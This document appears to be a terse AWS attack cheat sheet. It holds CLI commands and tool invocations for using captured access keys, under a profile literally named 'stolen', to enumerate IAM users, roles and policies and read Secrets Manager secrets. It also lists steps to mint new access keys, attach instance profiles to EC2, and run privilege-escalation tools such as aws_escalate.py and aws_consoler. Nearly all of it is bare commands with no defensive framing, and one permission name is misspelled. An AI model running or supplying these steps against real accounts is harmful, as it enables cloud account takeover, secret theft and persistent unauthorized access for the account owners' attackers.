[default] aws_access_key_id = XXX aws_secret_access_key = XXXX
export AWS_ACCESS_KEY_ID= export AWS_SECRET_ACCESS_KEY= export AWS_DEFAULT_REGION=
aws sts get-caller-identity aws sdb list-domains --region us-east-1
aws configure --profile stolen
aws sts get-caller-identity --profile stolen
aws sts get-access-key-info --access-key-id=ASIA1234567890123456
aws iam get-account-password-policy aws sts get-session-token aws iam list-users aws iam list-roles aws iam list-access-keys --user-name aws iam create-access-key --user-name aws iam list-attached-user-policies --user-name XXXX aws iam get-policy aws iam get-policy-version
aws deploy list-applications
aws directconnect describe-connections
aws secretsmanager get-secret-value --secret-id --profile
aws sns publish --topic-arn arn:aws:sns:us-east-1:account id:aaa --message aaa
ABIA - AWS STS service bearer token ACCA - Context-specific credential AGPA - Group AIDA - IAM user AIPA - Amazon EC2 instance profile AKIA - Access key ANPA - Managed policy ANVA - Version in a managed policy APKA - Public key AROA - Role ASCA - Certificate ASIA - Temporary (AWS STS) access key IDs use this prefix, but are unique only in combination with the secret access key and the session token.
python enumerate-iam.py --access-key XXXXXXXXXXXXX --secret-key XXXXXXXXXXX python enumerate-iam.py --access-key "ACCESSKEY" --secret-key "SECRETKEY" (--session-token "$AWS_SESSION_TOKEN")
https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
python aws_escalate.py
python2 nimbostratus dump-permissions
python3 scout.py aws
cloudsplaining download cloudsplaining scan
aws_consoler -a ASIAXXXX -s SECRETXXXX -t TOKENXXXX
./find_circular_trust.py python aws_role_juggler.py -r arn:aws:iam::123456789:role/BuildRole arn:aws:iam::123456789:role/GitRole arn:aws:iam::123456789:role/ArtiRole
python3 iamfinder.py init python3 iamfinder.py enum_user --aws_id 123456789012
IAM CLI ENUMERATION
aws configure --profile test set profile=test # Just for convenience
aws --profile "$profile" iam list-policies | jq -r ".Policies[].Arn"
aws --profile "$profile" iam get-policy --policy-arn "$i" --query "Policy.DefaultVersionId" --output text
profile="test"; for i in $(aws --profile "$profile" iam list-policies | jq -r '.Policies[].Arn'); do echo "Describing policy $i" && aws --profile "$profile" iam get-policy-version --policy-arn "$i" --version-id $(aws --profile "$profile" iam get-policy --policy-arn "$i" --query 'Policy.DefaultVersionId' --output text); done | tee /tmp/policies.log
#List Managed User policies aws --profile "test" iam list-attached-user-policies --user-name "test-user" #List Managed Group policies aws --profile "test" iam list-attached-group-policies --group-name "test-group" #List Managed Role policies aws --profile "test" iam list-attached-role-policies --role-name "test-role"
#List Inline User policies aws --profile "test" iam list-user-policies --user-name "test-user" #List Inline Group policies aws --profile "test" iam list-group-policies --group-name "test-group" #List Inline Role policies aws --profile "test" iam list-role-policies --role-name "test-role"
#Describe Inline User policies aws --profile "test" iam get-user-policy --user-name "test-user" --policy-name "test-policy" #Describe Inline Group policies aws --profile "test" iam get-group-policy --group-name "test-group" --policy-name "test-policy" #Describe Inline Role policies aws --profile "test" iam get-role-policy --role-name "test-role" --policy-name "test-policy"
aws --profile "test" iam get-role --role-name "test-role"
aws iam create-instance-profile --instance-profile-name YourNewRole-Instance-Profile
aws iam add-role-to-instance-profile --role-name YourNewRole --instance-profile-name YourNewRole-Instance-Profile
aws ec2 associate-iam-instance-profile --instance-id YourInstanceId --iam-instance-profile Name=YourNewRole-Instance-Profile
aws --profile test sts get-caller-identity
aws iam list-attached-user-policies --user-name {} aws iam get-policy-version --policy-arn provide_policy_arn --version-id $(aws iam get-policy --policy-arn provide_policy_arn --query 'Policy.DefaultVersionId' --output text) aws iam list-user-policies --user-name {} aws iam get-user-policy --policy-name policy_name_from_above_command --user-name {} | python -m json.tool
iam:CreatUser iam:CreateLoginProfile iam:UpdateProfile iam:AddUserToGroup